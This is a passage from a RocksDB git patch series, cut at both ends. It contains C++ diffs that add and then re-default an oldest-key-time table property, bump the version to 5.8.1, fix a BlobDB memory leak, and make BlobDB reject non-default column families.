Add(TablePropertiesNames::kOldestKeyTime, props.oldest_key_time); if (!props.filter_policy_name.empty()) { Add(TablePropertiesNames::kFilterPolicy, props.filter_policy_name); @@ -211,6 +212,8 @@ Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, &new_table_properties->column_family_id}, {TablePropertiesNames::kCreationTime, &new_table_properties->creation_time}, + {TablePropertiesNames::kOldestKeyTime, + &new_table_properties->oldest_key_time}, }; std::string last_key; diff --git a/table/table_builder.h b/table/table_builder.h index ef2e608ed46..d0ca0678ef2 100644 --- a/table/table_builder.h +++ b/table/table_builder.h @@ -10,6 +10,7 @@ #pragma once #include +#include #include #include #include @@ -55,7 +56,8 @@ struct TableBuilderOptions { const CompressionOptions& _compression_opts, const std::string* _compression_dict, bool _skip_filters, const std::string& _column_family_name, int _level, - const uint64_t _creation_time = 0) + const uint64_t _creation_time = 0, + const int64_t _oldest_key_time = std::numeric_limits::max()) : ioptions(_ioptions), internal_comparator(_internal_comparator), int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories), @@ -65,7 +67,8 @@ struct TableBuilderOptions { skip_filters(_skip_filters), column_family_name(_column_family_name), level(_level), - creation_time(_creation_time) {} + creation_time(_creation_time), + oldest_key_time(_oldest_key_time) {} const ImmutableCFOptions& ioptions; const InternalKeyComparator& internal_comparator; const std::vector>* @@ -78,6 +81,7 @@ struct TableBuilderOptions { const std::string& column_family_name; int level; // what level this table/file is on, -1 for "not set, don't know" const uint64_t creation_time; + const int64_t oldest_key_time; }; // TableBuilder provides the interface used to build a Table diff --git a/table/table_properties.cc b/table/table_properties.cc index ef77ae566aa..24453f6f9cd 100644 --- a/table/table_properties.cc +++ b/table/table_properties.cc @@ -139,6 +139,9 @@ std::string TableProperties::ToString( AppendProperty(result, "creation time", creation_time, prop_delim, kv_delim); + AppendProperty(result, "time stamp of earliest key", oldest_key_time, + prop_delim, kv_delim); + return result; } @@ -191,6 +194,8 @@ const std::string TablePropertiesNames::kPropertyCollectors = "rocksdb.property.collectors"; const std::string TablePropertiesNames::kCompression = "rocksdb.compression"; const std::string TablePropertiesNames::kCreationTime = "rocksdb.creation.time"; +const std::string TablePropertiesNames::kOldestKeyTime = + "rocksdb.oldest.key.time"; extern const std::string kPropertiesBlock = "rocksdb.properties"; // Old property block name for backward compatibility diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 41c1482e7e6..63b08bf459b 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -26,21 +26,9 @@ class BlobDBTest : public testing::Test { public: const int kMaxBlobSize = 1 << 14; - class MockEnv : public EnvWrapper { - public: - MockEnv() : EnvWrapper(Env::Default()) {} - - void set_now_micros(uint64_t now_micros) { now_micros_ = now_micros; } - - uint64_t NowMicros() override { return now_micros_; } - - private: - uint64_t now_micros_ = 0; - }; - BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), - mock_env_(new MockEnv()), + mock_env_(new MockTimeEnv(Env::Default())), blob_db_(nullptr) { Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions()); assert(s.ok()); @@ -147,7 +135,7 @@ class BlobDBTest : public testing::Test { } const std::string dbname_; - std::unique_ptr mock_env_; + std::unique_ptr mock_env_; std::shared_ptr ttl_extractor_; BlobDB *blob_db_; }; // class BlobDBTest @@ -174,13 +162,13 @@ TEST_F(BlobDBTest, PutWithTTL) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { uint64_t ttl = rnd.Next() % 100; PutRandomWithTTL("key" + ToString(i), ttl, &rnd, (ttl <= 50 ? nullptr : &data)); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -203,13 +191,13 @@ TEST_F(BlobDBTest, PutUntil) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, (expiration <= 100 ? nullptr : &data)); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -236,12 +224,13 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(0); + mock_env_->set_current_time(0); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd, &data); } // very far in the future.. - mock_env_->set_now_micros(std::numeric_limits::max() - 10); + mock_env_->set_current_time(std::numeric_limits::max() / 1000000 - + 10); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -282,11 +271,11 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -329,11 +318,11 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { PutRandom("key" + ToString(i), &rnd); } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -377,7 +366,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { bdb_options.disable_background_tasks = true; Open(bdb_options, options); std::map data; - mock_env_->set_now_micros(50 * 1000000); + mock_env_->set_current_time(50); for (size_t i = 0; i < 100; i++) { int len = rnd.Next() % kMaxBlobSize + 1; std::string key = "key" + ToString(i); @@ -390,7 +379,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { data[key] = value; } } - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); auto *bdb_impl = static_cast(blob_db_); auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); @@ -657,14 +646,14 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options, options); - mock_env_->set_now_micros(100 * 1000000); + mock_env_->set_current_time(100); ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); BlobDBImpl *blob_db_impl = static_cast_with_check(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); - mock_env_->set_now_micros(300 * 1000000); + mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", From 2879f4bebd9a717f2865afd1034838c1627554e5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 23 Oct 2017 22:08:21 -0700 Subject: [PATCH 166/205] Bump version to 5.8.1 --- HISTORY.md | 2 +- include/rocksdb/version.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 23bcdaee22a..e62622e081c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,5 @@ # Rocksdb Change Log -## Unreleased +## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dd11ea7e8e5..02234a2e2f3 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 0 +#define ROCKSDB_PATCH 1 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 30b38c98cf7757d4b2d24db550a5c4ed70df8a6d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 27 Oct 2017 14:49:40 -0700 Subject: [PATCH 167/205] TableProperty::oldest_key_time defaults to 0 Summary: We don't propagate TableProperty::oldest_key_time on compaction and just write the default value to SST files. It is more natural to default the value to 0. Also revert db_sst_test back to before #2842. Closes https://github.com/facebook/rocksdb/pull/3079 Differential Revision: D6165702 Pulled By: yiwu-arbug fbshipit-source-id: ca3ce5928d96ae79a5beb12bb7d8c640a71478a0 --- db/builder.h | 6 ++---- db/db_sst_test.cc | 26 +++++++++++++++++--------- db/flush_job.cc | 1 - db/internal_stats.cc | 11 ++++++++--- include/rocksdb/table_properties.h | 5 ++--- table/block_based_table_builder.cc | 3 +-- table/block_based_table_builder.h | 2 +- table/table_builder.h | 4 +--- 8 files changed, 32 insertions(+), 26 deletions(-) diff --git a/db/builder.h b/db/builder.h index f637368822b..5a5081c647e 100644 --- a/db/builder.h +++ b/db/builder.h @@ -6,7 +6,6 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. #pragma once -#include #include #include #include @@ -52,7 +51,7 @@ TableBuilder* NewTableBuilder( const CompressionOptions& compression_opts, int level, const std::string* compression_dict = nullptr, const bool skip_filters = false, const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits::max()); + const uint64_t oldest_key_time = 0); // Build a Table file from the contents of *iter. The generated file // will be named according to number specified in meta. On success, the rest of @@ -79,7 +78,6 @@ extern Status BuildTable( EventLogger* event_logger = nullptr, int job_id = 0, const Env::IOPriority io_priority = Env::IO_HIGH, TableProperties* table_properties = nullptr, int level = -1, - const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits::max()); + const uint64_t creation_time = 0, const uint64_t oldest_key_time = 0); } // namespace rocksdb diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 56e00df83f7..e01754c44e4 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -650,9 +650,18 @@ TEST_F(DBSSTTest, OpenDBWithInfiniteMaxOpenFiles) { } TEST_F(DBSSTTest, GetTotalSstFilesSize) { + // We don't propagate oldest-key-time table property on compaction and + // just write 0 as default value. This affect the exact table size, since + // we encode table properties as varint64. Force time to be 0 to work around + // it. Should remove the workaround after we propagate the property on + // compaction. + std::unique_ptr mock_env(new MockTimeEnv(Env::Default())); + mock_env->set_current_time(0); + Options options = CurrentOptions(); options.disable_auto_compactions = true; options.compression = kNoCompression; + options.env = mock_env.get(); DestroyAndReopen(options); // Generate 5 files in L0 for (int i = 0; i < 5; i++) { @@ -701,13 +710,9 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 1 (compacted file) - // The 5 bytes difference comes from oldest-key-time table property isn't - // propagated on compaction. It is written with default value - // std::numeric_limits::max as varint64. - ASSERT_EQ(live_sst_files_size, 1 * single_file_size + 5); - - // Total SST files = 5 original files + compacted file - ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); + // Total SST files = 6 (5 original files + compacted file) + ASSERT_EQ(live_sst_files_size, 1 * single_file_size); + ASSERT_EQ(total_sst_files_size, 6 * single_file_size); // hold current version std::unique_ptr iter2(dbfull()->NewIterator(ReadOptions())); @@ -728,14 +733,14 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { &total_sst_files_size)); // Live SST files = 0 // Total SST files = 6 (5 original files + compacted file) - ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); + ASSERT_EQ(total_sst_files_size, 6 * single_file_size); iter1.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 0 // Total SST files = 1 (compacted file) - ASSERT_EQ(total_sst_files_size, live_sst_files_size); + ASSERT_EQ(total_sst_files_size, 1 * single_file_size); iter2.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", @@ -743,6 +748,9 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { // Live SST files = 0 // Total SST files = 0 ASSERT_EQ(total_sst_files_size, 0); + + // Close db before mock_env destruct. + Close(); } TEST_F(DBSSTTest, GetTotalSstFilesSizeVersionsFilesShared) { diff --git a/db/flush_job.cc b/db/flush_job.cc index f0903f79b46..778c9eca124 100644 --- a/db/flush_job.cc +++ b/db/flush_job.cc @@ -16,7 +16,6 @@ #include #include -#include #include #include "db/builder.h" diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 2eff2865261..e98bd98cf77 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -800,10 +800,15 @@ bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/, *value = std::numeric_limits::max(); for (auto& p : collection) { *value = std::min(*value, p.second->oldest_key_time); + if (*value == 0) { + break; + } + } + if (*value > 0) { + *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(), + cfd_->imm()->ApproximateOldestKeyTime(), *value}); } - *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(), - cfd_->imm()->ApproximateOldestKeyTime(), *value}); - return *value < std::numeric_limits::max(); + return *value > 0 && *value < std::numeric_limits::max(); } void InternalStats::DumpDBStats(std::string* value) { diff --git a/include/rocksdb/table_properties.h b/include/rocksdb/table_properties.h index e8bbabc3ba7..2605fadd257 100644 --- a/include/rocksdb/table_properties.h +++ b/include/rocksdb/table_properties.h @@ -4,7 +4,6 @@ #pragma once #include -#include #include #include #include "rocksdb/status.h" @@ -164,8 +163,8 @@ struct TableProperties { // The time when the SST file was created. // Since SST files are immutable, this is equivalent to last modified time. uint64_t creation_time = 0; - // Timestamp of the earliest key - uint64_t oldest_key_time = std::numeric_limits::max(); + // Timestamp of the earliest key. 0 means unknown. + uint64_t oldest_key_time = 0; // Name of the column family with which this SST file is associated. // If column family is unknown, `column_family_name` will be an empty string. diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index d48c48cfdd1..e82f91aec7f 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -10,7 +10,6 @@ #include "table/block_based_table_builder.h" #include -#include #include #include @@ -276,7 +275,7 @@ struct BlockBasedTableBuilder::Rep { uint32_t column_family_id; const std::string& column_family_name; uint64_t creation_time = 0; - uint64_t oldest_key_time = std::numeric_limits::max(); + uint64_t oldest_key_time = 0; std::vector> table_properties_collectors; diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h index c9197ef5cce..36dfce1f0fb 100644 --- a/table/block_based_table_builder.h +++ b/table/block_based_table_builder.h @@ -48,7 +48,7 @@ class BlockBasedTableBuilder : public TableBuilder { const CompressionOptions& compression_opts, const std::string* compression_dict, const bool skip_filters, const std::string& column_family_name, const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits::max()); + const uint64_t oldest_key_time = 0); // REQUIRES: Either Finish() or Abandon() has been called. ~BlockBasedTableBuilder(); diff --git a/table/table_builder.h b/table/table_builder.h index d0ca0678ef2..e5e7d6e22f7 100644 --- a/table/table_builder.h +++ b/table/table_builder.h @@ -10,7 +10,6 @@ #pragma once #include -#include #include #include #include @@ -56,8 +55,7 @@ struct TableBuilderOptions { const CompressionOptions& _compression_opts, const std::string* _compression_dict, bool _skip_filters, const std::string& _column_family_name, int _level, - const uint64_t _creation_time = 0, - const int64_t _oldest_key_time = std::numeric_limits::max()) + const uint64_t _creation_time = 0, const int64_t _oldest_key_time = 0) : ioptions(_ioptions), internal_comparator(_internal_comparator), int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories), From 65aec19df182f9d970c651e30529abab785bcc0e Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 1 Sep 2017 14:08:19 -0700 Subject: [PATCH 168/205] Fix memory leak on blob db open Summary: Fixes #2820 Closes https://github.com/facebook/rocksdb/pull/2826 Differential Revision: D5757527 Pulled By: yiwu-arbug fbshipit-source-id: f495b63700495aeaade30a1da5e3675848f3d72f --- utilities/blob_db/blob_db.cc | 3 +++ 1 file changed, 3 insertions(+) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 4f95b61f284..947840751e5 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -142,16 +142,19 @@ Status BlobDB::Open(const DBOptions& db_options_input, s = bdb->OpenPhase1(); if (!s.ok()) { + delete bdb; return s; } if (no_base_db) { + *blob_db = bdb; return s; } DB* db = nullptr; s = DB::Open(db_options, dbname, column_families, handles, &db); if (!s.ok()) { + delete bdb; return s; } From eae53de3b5dba6afb57dbff5a63f1bb21ffffbff Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 8 Sep 2017 10:57:12 -0700 Subject: [PATCH 169/205] Make it explicit blob db doesn't support CF Summary: Blob db doesn't currently support column families. Return NotSupported status explicitly. Closes https://github.com/facebook/rocksdb/pull/2825 Differential Revision: D5757438 Pulled By: yiwu-arbug fbshipit-source-id: 44de9408fd032c98e8ae337d4db4ed37169bd9fa --- utilities/blob_db/blob_db.h | 84 +++++++++++++++++----- utilities/blob_db/blob_db_impl.cc | 116 +++++++++++++++--------------- utilities/blob_db/blob_db_impl.h | 42 ++++------- utilities/blob_db/blob_db_test.cc | 33 +++++++++ 4 files changed, 173 insertions(+), 102 deletions(-) diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 8d6725f60e0..67463d07b30 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -85,34 +85,55 @@ struct BlobDBOptions { class BlobDB : public StackableDB { public: using rocksdb::StackableDB::Put; - + virtual Status Put(const WriteOptions& options, const Slice& key, + const Slice& value) override = 0; virtual Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override = 0; + const Slice& value) override { + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return Put(options, key, value); + } using rocksdb::StackableDB::Delete; virtual Status Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key) override = 0; + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return Delete(options, key); + } + virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t ttl) = 0; virtual Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, uint64_t ttl) = 0; - - virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) { - return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return PutWithTTL(options, key, value, ttl); } // Put with expiration. Key with expiration time equal to // std::numeric_limits::max() means the key don't expire. + virtual Status PutUntil(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration) = 0; virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, uint64_t expiration) = 0; - - virtual Status PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { - return PutUntil(options, DefaultColumnFamily(), key, value, expiration); + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return PutUntil(options, key, value, expiration); } using rocksdb::StackableDB::Get; @@ -123,25 +144,52 @@ class BlobDB : public StackableDB { using rocksdb::StackableDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& options, - const std::vector& column_family, const std::vector& keys, std::vector* values) override = 0; + virtual std::vector MultiGet( + const ReadOptions& options, + const std::vector& column_families, + const std::vector& keys, + std::vector* values) override { + for (auto column_family : column_families) { + if (column_family != DefaultColumnFamily()) { + return std::vector( + column_families.size(), + Status::NotSupported( + "Blob DB doesn't support non-default column family.")); + } + } + return MultiGet(options, keys, values); + } using rocksdb::StackableDB::SingleDelete; - virtual Status SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) override = 0; + virtual Status SingleDelete(const WriteOptions& /*wopts*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { + return Status::NotSupported("Not supported operation in blob db."); + } using rocksdb::StackableDB::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in blob db."); } virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override = 0; + using rocksdb::StackableDB::NewIterator; + virtual Iterator* NewIterator(const ReadOptions& options) override = 0; + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { + if (column_family != DefaultColumnFamily()) { + // Blob DB doesn't support non-default column family. + return nullptr; + } + return NewIterator(options); + } + // Starting point for opening a Blob DB. // changed_options - critical. Blob DB loads and inserts listeners // into options which are necessary for recovery and atomicity diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 553f89f2a58..777018aef15 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -749,32 +749,20 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return bfile; } -Status BlobDBImpl::Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, +Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, const Slice& value) { std::string new_value; Slice value_slice; uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); - return PutUntil(options, column_family, key, value_slice, expiration); + return PutUntil(options, key, value_slice, expiration); } -Status BlobDBImpl::Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key) { +Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); - Status s = db_->Delete(options, column_family, key); + Status s = db_->Delete(options, key); // add deleted key to list of keys that have been deleted for book-keeping - delete_keys_q_.enqueue({column_family, key.ToString(), lsn}); - return s; -} - -Status BlobDBImpl::SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) { - SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); - Status s = db_->SingleDelete(wopts, column_family, key); - - delete_keys_q_.enqueue({column_family, key.ToString(), lsn}); + delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); return s; } @@ -788,10 +776,17 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { std::shared_ptr last_file_; bool has_put_; std::string new_value_; + uint32_t default_cf_id_; public: explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) - : impl_(impl), sequence_(seq), has_put_(false) {} + : impl_(impl), + sequence_(seq), + has_put_(false), + default_cf_id_(reinterpret_cast( + impl_->DefaultColumnFamily()) + ->cfd() + ->GetID()) {} WriteBatch& updates_blob() { return updates_blob_; } @@ -803,6 +798,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } Slice value_unc; uint64_t expiration = impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); @@ -851,11 +851,28 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); sequence_++; return Status::OK(); } + virtual Status DeleteRange(uint32_t column_family_id, + const Slice& begin_key, const Slice& end_key) { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } + WriteBatchInternal::DeleteRange(&updates_blob_, column_family_id, + begin_key, end_key); + return Status::OK(); + } + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, const Slice& /*key*/) override { batch_rewrite_status_ = @@ -932,12 +949,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } Status BlobDBImpl::PutWithTTL(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, uint64_t ttl) { uint64_t now = EpochNow(); assert(std::numeric_limits::max() - now > ttl); - return PutUntil(options, column_family, key, value, now + ttl); + return PutUntil(options, key, value, now + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -952,8 +968,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } -Status BlobDBImpl::PutUntil(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, +Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value_unc, uint64_t expiration) { TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); @@ -992,14 +1007,11 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, bfile->PathName().c_str(), key.ToString().c_str(), value.size(), s.ToString().c_str(), bfile->DumpState().c_str()); - // Fallback just write to the LSM and get going - WriteBatch batch; - batch.Put(column_family, key, value); - return db_->Write(options, &batch); + return s; } WriteBatch batch; - batch.Put(column_family, key, index_entry); + batch.Put(key, index_entry); // this goes to the base db and can be expensive s = db_->Write(options, &batch); @@ -1123,7 +1135,6 @@ Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, std::vector BlobDBImpl::MultiGet( const ReadOptions& read_options, - const std::vector& column_family, const std::vector& keys, std::vector* values) { // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. @@ -1131,21 +1142,18 @@ std::vector BlobDBImpl::MultiGet( bool snapshot_created = SetSnapshotIfNeeded(&ro); std::vector values_lsm; values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(ro, column_family, keys, &values_lsm); + auto statuses = db_->MultiGet(ro, keys, &values_lsm); TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); values->resize(keys.size()); assert(statuses.size() == keys.size()); + assert(values_lsm.size() == keys.size()); for (size_t i = 0; i < keys.size(); ++i) { if (!statuses[i].ok()) { continue; } - - auto cfh = reinterpret_cast(column_family[i]); - auto cfd = cfh->cfd(); - - Status s = CommonGet(cfd, keys[i], values_lsm[i], &((*values)[i])); + Status s = CommonGet(keys[i], values_lsm[i], &((*values)[i])); statuses[i] = s; } if (snapshot_created) { @@ -1163,9 +1171,8 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { return true; } -Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, - const std::string& index_entry, std::string* value, - SequenceNumber* sequence) { +Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, + std::string* value, SequenceNumber* sequence) { Slice index_entry_slice(index_entry); BlobHandle handle; Status s = handle.DecodeFrom(&index_entry_slice); @@ -1269,10 +1276,12 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, if (bdb_options_.compression != kNoCompression) { BlockContents contents; + auto cfh = + reinterpret_cast(DefaultColumnFamily()); s = UncompressBlockContentsForCompressionType( blob_value.data(), blob_value.size(), &contents, kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, - *(cfd->ioptions())); + *(cfh->cfd()->ioptions())); *value = contents.data.ToString(); } } @@ -1299,9 +1308,10 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, Status BlobDBImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) { - auto cfh = reinterpret_cast(column_family); - auto cfd = cfh->cfd(); - + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. // TODO(yiwu): For Get() retry if file not found would be a simpler strategy. @@ -1310,11 +1320,11 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; std::string index_entry; - s = db_->Get(ro, column_family, key, &index_entry); + s = db_->Get(ro, key, &index_entry); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); 